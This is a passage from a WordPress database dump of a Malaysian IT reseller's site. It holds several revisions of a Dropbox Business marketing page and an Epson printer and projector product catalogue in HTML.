src=\"https://bintara.com.my/wp-content/uploads/2018/12/download.png\" alt=\"\" width=\"475\" height=\"57\" />\r\n\r\n&nbsp;\r\n<h2 class=\"c43-page-header-level-3-plank__headline\">Small business solutions</h2>\r\n<div class=\"c43-page-header-level-3-plank__text\">\r\nEvery business starts out small. We did. And we know from experience the benefits of having the right tools. Tools that help you grow, and grow with you. Tools that let small teams have a big impact.\r\n\r\n&nbsp;\r\n<h2 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Small but mighty businesses run on Dropbox</h2>\r\n<div class=\"c01-section-heading-plank__subheadline plank-text\">\r\nWhatever the size, Dropbox Business is helping these businesses bring new ideas to the world and find new ways of working together to achieve mighty things.\r\n</div>\r\n</div>\r\n\r\n<hr />\r\n\r\n&nbsp;\r\n<h2>Features</h2>\r\n<strong>Flexible storage plans</strong>\r\nChoose the right plan to ensure your team has the space it needs to be productive.\r\n\r\n<strong>File and version recovery</strong>\r\nEasily recover deleted files and restore previous file versions.\r\n\r\n<strong>Team folder manager</strong>\r\nGet visibility and control over team folders, including sync management.\r\n\r\n<strong>Link permissions</strong>\r\nPassword-protect your links, disable downloads, or set expiration dates to grant temporary access.\r\n\r\n<strong>Dropbox Paper</strong>\r\nA simple, powerful way to create, share, and keep your team in sync â€” with the added benefit of admin controls.\r\n\r\n<strong>Smart Sync</strong>\r\nAccess every file in their Dropbox, right from their desktop, using very little hard disk space.\r\n\r\n<strong>Admin dashboard</strong>\r\nMonitor team activity, view connected devices, and audit sharing activity.\r\n\r\n<strong>Account transfer tool</strong>\r\nEasily transfer files from one user to another when responsibilities change.\r\n\r\n<strong>Dropbox Showcase</strong>\r\nPresent work in a professionally-packaged page and track who engages with your files.\r\n\r\n<strong>Remote wipe</strong>\r\nClear files from lost or stolen devices to keep company files in the right hands.\r\n\r\n<strong>Third-party app integrations</strong>\r\nExtend the power of Dropbox with over 300,000 connected apps.\r\n\r\n<strong>Live support</strong>\r\nQuickly get answers to your questions via priority phone, email, and chat support.\r\n\r\n\r\n<h2 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Keep your team productive and your data safe</h2>\r\n\r\n&nbsp;\r\n<h4 class=\"a23-media-block__title\">File backup</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nGet the storage your business needs to share and collaborate seamlessly.\r\n<h4 class=\"a23-media-block__title\">Team collaboration</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nStay productive with new ways to easily share work and collect feedback.\r\n<h4 class=\"a23-media-block__title\">Administrative tools</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nTeam management stays simple from a central location, the admin console.\r\n<h4 class=\"a23-media-block__title\">Security features</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nProtect sensitive company files with enterprise-grade security features.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Dropbox','','inherit','closed','closed','','1473-revision-v1','','','2019-09-25 16:10:37','2019-09-25 08:10:37','',1473,'https://bintara.com.my/blog/2019/09/25/1473-revision-v1/',0,'revision','',0),(3439,1,'2019-09-25 16:12:20','2019-09-25 08:12:20','<img class=\"alignnone wp-image-1891\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/download.png\" alt=\"\" width=\"475\" height=\"57\" />\r\n\r\n&nbsp;\r\n<h2 class=\"c43-page-header-level-3-plank__headline\">Small business solutions</h2>\r\n<div class=\"c43-page-header-level-3-plank__text\">\r\nEvery business starts out small. We did. And we know from experience the benefits of having the right tools. Tools that help you grow, and grow with you. Tools that let small teams have a big impact.\r\n\r\n&nbsp;\r\n<h2 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Small but mighty businesses run on Dropbox</h2>\r\n<div class=\"c01-section-heading-plank__subheadline plank-text\">\r\nWhatever the size, Dropbox Business is helping these businesses bring new ideas to the world and find new ways of working together to achieve mighty things.\r\n</div>\r\n</div>\r\n\r\n<hr />\r\n\r\n&nbsp;\r\n<h2>Features</h2>\r\n<strong>Flexible storage plans</strong>\r\nChoose the right plan to ensure your team has the space it needs to be productive.\r\n\r\n<strong>File and version recovery</strong>\r\nEasily recover deleted files and restore previous file versions.\r\n\r\n<strong>Team folder manager</strong>\r\nGet visibility and control over team folders, including sync management.\r\n\r\n<strong>Link permissions</strong>\r\nPassword-protect your links, disable downloads, or set expiration dates to grant temporary access.\r\n\r\n<strong>Dropbox Paper</strong>\r\nA simple, powerful way to create, share, and keep your team in sync â€” with the added benefit of admin controls.\r\n\r\n<strong>Smart Sync</strong>\r\nAccess every file in their Dropbox, right from their desktop, using very little hard disk space.\r\n\r\n<strong>Admin dashboard</strong>\r\nMonitor team activity, view connected devices, and audit sharing activity.\r\n\r\n<strong>Account transfer tool</strong>\r\nEasily transfer files from one user to another when responsibilities change.\r\n\r\n<strong>Dropbox Showcase</strong>\r\nPresent work in a professionally-packaged page and track who engages with your files.\r\n\r\n<strong>Remote wipe</strong>\r\nClear files from lost or stolen devices to keep company files in the right hands.\r\n\r\n<strong>Third-party app integrations</strong>\r\nExtend the power of Dropbox with over 300,000 connected apps.\r\n\r\n<strong>Live support</strong>\r\nQuickly get answers to your questions via priority phone, email, and chat support.\r\n\r\n\r\n&nbsp;\r\n<h2 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Keep your team productive and your data safe</h2>\r\n\r\n<h4 class=\"a23-media-block__title\">File backup</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nGet the storage your business needs to share and collaborate seamlessly.\r\n<h4 class=\"a23-media-block__title\">Team collaboration</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nStay productive with new ways to easily share work and collect feedback.\r\n<h4 class=\"a23-media-block__title\">Administrative tools</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nTeam management stays simple from a central location, the admin console.\r\n<h4 class=\"a23-media-block__title\">Security features</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nProtect sensitive company files with enterprise-grade security features.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Dropbox','','inherit','closed','closed','','1473-revision-v1','','','2019-09-25 16:12:20','2019-09-25 08:12:20','',1473,'https://bintara.com.my/blog/2019/09/25/1473-revision-v1/',0,'revision','',0),(3444,1,'2019-09-25 16:17:16','2019-09-25 08:17:16','<img class=\"alignnone wp-image-1891\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/download.png\" alt=\"\" width=\"475\" height=\"57\" />\r\n\r\n&nbsp;\r\n<h2 class=\"c43-page-header-level-3-plank__headline\">Small business solutions</h2>\r\n<div class=\"c43-page-header-level-3-plank__text\">\r\nEvery business starts out small. We did. And we know from experience the benefits of having the right tools. Tools that help you grow, and grow with you. Tools that let small teams have a big impact.\r\n\r\n&nbsp;\r\n<h2 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Small but mighty businesses run on Dropbox</h2>\r\n<div class=\"c01-section-heading-plank__subheadline plank-text\">\r\nWhatever the size, Dropbox Business is helping these businesses bring new ideas to the world and find new ways of working together to achieve mighty things.\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n<h2>Features</h2>\r\n<strong>Flexible storage plans</strong>\r\nChoose the right plan to ensure your team has the space it needs to be productive.\r\n\r\n<strong>File and version recovery</strong>\r\nEasily recover deleted files and restore previous file versions.\r\n\r\n<strong>Team folder manager</strong>\r\nGet visibility and control over team folders, including sync management.\r\n\r\n<strong>Link permissions</strong>\r\nPassword-protect your links, disable downloads, or set expiration dates to grant temporary access.\r\n\r\n<strong>Dropbox Paper</strong>\r\nA simple, powerful way to create, share, and keep your team in sync â€” with the added benefit of admin controls.\r\n\r\n<strong>Smart Sync</strong>\r\nAccess every file in their Dropbox, right from their desktop, using very little hard disk space.\r\n\r\n<strong>Admin dashboard</strong>\r\nMonitor team activity, view connected devices, and audit sharing activity.\r\n\r\n<strong>Account transfer tool</strong>\r\nEasily transfer files from one user to another when responsibilities change.\r\n\r\n<strong>Dropbox Showcase</strong>\r\nPresent work in a professionally-packaged page and track who engages with your files.\r\n\r\n<strong>Remote wipe</strong>\r\nClear files from lost or stolen devices to keep company files in the right hands.\r\n\r\n<strong>Third-party app integrations</strong>\r\nExtend the power of Dropbox with over 300,000 connected apps.\r\n\r\n<strong>Live support</strong>\r\nQuickly get answers to your questions via priority phone, email, and chat support.\r\n\r\n\r\n&nbsp;\r\n<h2 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Keep your team productive and your data safe</h2>\r\n\r\n<strong>File backup</strong>\r\nGet the storage your business needs to share and collaborate seamlessly.\r\n\r\n<strong>Team collaboration</strong>\r\nStay productive with new ways to easily share work and collect feedback.\r\n\r\n<strong>Administrative tools</strong>\r\nTeam management stays simple from a central location, the admin console.\r\n\r\n<strong>Security features</strong>\r\nProtect sensitive company files with enterprise-grade security features.\r\n\r\n&nbsp;\r\n<center>[maxbutton id=\"1\" ]</center>','Dropbox','','inherit','closed','closed','','1473-revision-v1','','','2019-09-25 16:17:16','2019-09-25 08:17:16','',1473,'https://bintara.com.my/blog/2019/09/25/1473-revision-v1/',0,'revision','',0),(3443,1,'2019-09-25 16:15:26','2019-09-25 08:15:26','<img class=\"alignnone wp-image-1891\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/download.png\" alt=\"\" width=\"475\" height=\"57\" />\r\n\r\n&nbsp;\r\n<h2 class=\"c43-page-header-level-3-plank__headline\">Small business solutions</h2>\r\n<div class=\"c43-page-header-level-3-plank__text\">\r\nEvery business starts out small. We did. And we know from experience the benefits of having the right tools. Tools that help you grow, and grow with you. Tools that let small teams have a big impact.\r\n\r\n&nbsp;\r\n<h2 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Small but mighty businesses run on Dropbox</h2>\r\n<div class=\"c01-section-heading-plank__subheadline plank-text\">\r\nWhatever the size, Dropbox Business is helping these businesses bring new ideas to the world and find new ways of working together to achieve mighty things.\r\n</div>\r\n</div>\r\n\r\n<hr />\r\n\r\n&nbsp;\r\n<h2>Features</h2>\r\n<strong>Flexible storage plans</strong>\r\nChoose the right plan to ensure your team has the space it needs to be productive.\r\n\r\n<strong>File and version recovery</strong>\r\nEasily recover deleted files and restore previous file versions.\r\n\r\n<strong>Team folder manager</strong>\r\nGet visibility and control over team folders, including sync management.\r\n\r\n<strong>Link permissions</strong>\r\nPassword-protect your links, disable downloads, or set expiration dates to grant temporary access.\r\n\r\n<strong>Dropbox Paper</strong>\r\nA simple, powerful way to create, share, and keep your team in sync â€” with the added benefit of admin controls.\r\n\r\n<strong>Smart Sync</strong>\r\nAccess every file in their Dropbox, right from their desktop, using very little hard disk space.\r\n\r\n<strong>Admin dashboard</strong>\r\nMonitor team activity, view connected devices, and audit sharing activity.\r\n\r\n<strong>Account transfer tool</strong>\r\nEasily transfer files from one user to another when responsibilities change.\r\n\r\n<strong>Dropbox Showcase</strong>\r\nPresent work in a professionally-packaged page and track who engages with your files.\r\n\r\n<strong>Remote wipe</strong>\r\nClear files from lost or stolen devices to keep company files in the right hands.\r\n\r\n<strong>Third-party app integrations</strong>\r\nExtend the power of Dropbox with over 300,000 connected apps.\r\n\r\n<strong>Live support</strong>\r\nQuickly get answers to your questions via priority phone, email, and chat support.\r\n\r\n\r\n&nbsp;\r\n<h2 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Keep your team productive and your data safe</h2>\r\n\r\n<strong>File backup</strong>\r\nGet the storage your business needs to share and collaborate seamlessly.\r\n\r\n<strong>Team collaboration</strong>\r\nStay productive with new ways to easily share work and collect feedback.\r\n\r\n<strong>Administrative tools</strong>\r\nTeam management stays simple from a central location, the admin console.\r\n\r\n<strong>Security features</strong>\r\nProtect sensitive company files with enterprise-grade security features.\r\n\r\n&nbsp;\r\n<center>[maxbutton id=\"1\" ]</center>','Dropbox','','inherit','closed','closed','','1473-revision-v1','','','2019-09-25 16:15:26','2019-09-25 08:15:26','',1473,'https://bintara.com.my/blog/2019/09/25/1473-revision-v1/',0,'revision','',0),(3446,1,'2019-09-25 16:42:59','2019-09-25 08:42:59','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><p><strong>Epson WorkForce WF-7711</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /></p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.</p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Duplex printing up to A3 size</li><li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li><li>4.3â€ Colour LCD Touch Panel</li><li>Print, Scan, Copy Fax with ADF</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INK TANK SYSTEM</h3>		\n		<p><strong>Epson EcoTank L3150</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L120 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson M1100 Printer</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>LASER PRINTER</h3>		\n		<p><strong>Epson AcuLaser C9300N</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<p>Â <strong>Epson WorkForce AL-M320DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson WorkForce AL-M8100DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h3>POS PRINTER</h3>		\n		<p><strong>Epson TM-H6000IVÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T88V-iÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T70IIÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>[maxbutton id=\"12\" ]		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you 